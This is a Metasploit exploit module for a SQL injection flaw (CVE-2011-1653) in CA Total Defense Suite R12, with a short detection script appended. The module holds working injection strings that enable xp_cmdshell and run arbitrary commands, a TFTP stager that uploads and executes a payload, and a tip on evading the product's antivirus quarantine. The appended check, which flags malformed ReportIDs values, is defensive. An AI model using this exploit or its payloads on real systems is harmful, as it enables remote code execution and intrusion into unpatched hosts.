##
# $Id: ca_totaldefense_regeneratereports.rb 13810 2011-10-02 17:03:23Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::CmdStagerTFTP
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection',
      'Description'    => %q{
          This module exploits a SQL injection flaw in CA Total Defense Suite R12.
        When supplying a specially crafted SOAP request to '/UNCWS/Management.asmx',
        an attacker can abuse the reGenerateReports stored procedure by injecting
        arbitrary SQL statements into the ReportIDs element.

        NOTE: This module was tested against the MS SQL Server 2005 Express that's
        bundled with CA Total Defense Suite R12. CA's Total Defense Suite real-time
        protection will quarantine the default framework executable payload. Choosing
        an alternate exe template will bypass the quarantine.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 13810 $',
      'References'     =>
        [
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-134' ],
          [ 'OSVDB', '74968' ],
          [ 'CVE', '2011-1653' ],
        ],
      'Targets'        =>
        [
          [ 'Windows Universal', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ]
        ],
      'Privileged'     => true,
      'Platform'       => 'win',
      'DisclosureDate' => 'Apr 13 2011',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(34443),
        OptBool.new('SSL', [ true, 'Use SSL', true ]),
        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
      ], self.class)
  end

  # Upload the payload executable through the TFTP command stager, then run it.
  def windows_stager
    exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"

    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
    execute_cmdstager({ :temp => '.' })
    @payload_exe = payload_exe

    print_status("Attempting to execute the payload...")
    execute_command(@payload_exe)
  end

  # Each element of 'inject' is sent as the ReportIDs value of a separate
  # reGenerateReports request; the server reports SUCCESS for each one.
  def execute_command(cmd, opts = {})
    inject = [
      "'') exec master.dbo.sp_configure 'show advanced options', 1;reconfigure;--",
      "'') exec master.dbo.sp_configure 'xp_cmdshell',1;reconfigure;--",
      "'') exec master.dbo.xp_cmdshell 'cmd.exe /c #{cmd}';--",
    ]

    inject.each do |sqli|
      soap = %Q|<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
  <soap12:Body>
    <reGenerateReports xmlns="http://tempuri.org/">
      <EnterpriseID>msf</EnterpriseID>
      <ReportIDs>#{sqli}</ReportIDs>
      <UserID>187</UserID>
    </reGenerateReports>
  </soap12:Body>
</soap12:Envelope>
|

      res = send_request_cgi(
        {
          'uri'     => '/UNCWS/Management.asmx',
          'method'  => 'POST',
          'version' => '1.0',
          'ctype'   => 'application/soap+xml; charset=utf-8',
          'data'    => soap,
        }, 5)

      if ( res and res.body =~ /SUCCESS/ )
        #print_good("Executing command...")
      else
        raise RuntimeError, 'Something went wrong.'
      end
    end
  end

  def exploit
    # A user-supplied CMD bypasses the stager entirely.
    if not datastore['CMD'].empty?
      print_status("Executing command '#{datastore['CMD']}'")
      execute_command(datastore['CMD'])
      return
    end

    case target['Platform']
    when 'win'
      windows_stager
    else
      raise RuntimeError, 'Target not supported.'
    end

    handler
  end
end

__END__
POST /UNCWS/Management.asmx HTTP/1.1
Host: 192.168.31.129
Content-Type: application/soap+xml; charset=utf-8
Content-Length: length

<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
  <soap12:Body>
    <reGenerateReports xmlns="http://tempuri.org/">
      <EnterpriseID>string</EnterpriseID>
      <ReportIDs>string</ReportIDs>       <--boom!!
      <UserID>long</UserID>
    </reGenerateReports>
  </soap12:Body>
</soap12:Envelope>
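Added detection example, not part of the module above: a REXML check that a defender could run over SOAP bodies posted to /UNCWS/Management.asmx, flagging reGenerateReports requests whose ReportIDs element does not look like the list of integer report IDs the operation presumably expects (that expected shape is an assumption; the page only types the element as "string"). The soap_body helper is also an assumption used to build constructed sample requests.

```ruby
require 'rexml/document'

# Benign ReportIDs value shape (assumption: a comma-separated list of integer
# report IDs; the page only types the element as "string").
REPORT_IDS_OK = /\A\s*\d+(\s*,\s*\d+)*\s*\z/

# Returns a list of findings for one SOAP request body; empty when it looks benign.
def inspect_regenerate_reports(body)
  findings = []
  doc = REXML::Document.new(body)
  return ['no root element'] if doc.root.nil?
  doc.root.each_recursive do |el|
    next unless el.name == 'reGenerateReports'   # local name, any namespace
    ids = el.elements.to_a.find { |c| c.name == 'ReportIDs' }
    next if ids.nil?
    value = ids.text.to_s
    findings << "ReportIDs is not a list of integer IDs: #{value.inspect}" unless value =~ REPORT_IDS_OK
    findings << 'ReportIDs carries a quote or statement terminator' if value =~ /['";]/
    findings << 'ReportIDs carries a T-SQL comment marker' if value.include?('--')
  end
  findings
rescue REXML::ParseException => e
  ["malformed SOAP body: #{e.message}"]
end

# Builds a constructed request body shaped like the one in the module's __END__ block.
def soap_body(report_ids)
  <<~XML
    <?xml version="1.0" encoding="utf-8"?>
    <soap12:Envelope xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
      <soap12:Body>
        <reGenerateReports xmlns="http://tempuri.org/">
          <EnterpriseID>msf</EnterpriseID>
          <ReportIDs>#{report_ids}</ReportIDs>
          <UserID>187</UserID>
        </reGenerateReports>
      </soap12:Body>
    </soap12:Envelope>
  XML
end

if __FILE__ == $0
  puts inspect_regenerate_reports(soap_body('1, 2, 3')).inspect
  puts inspect_regenerate_reports(soap_body("1'); select 1;--")).inspect
end
```

The same check can be applied to a proxy or WAF log of request bodies; a body that fails the integer-list test on this operation is worth alerting on regardless of which SQL it carries.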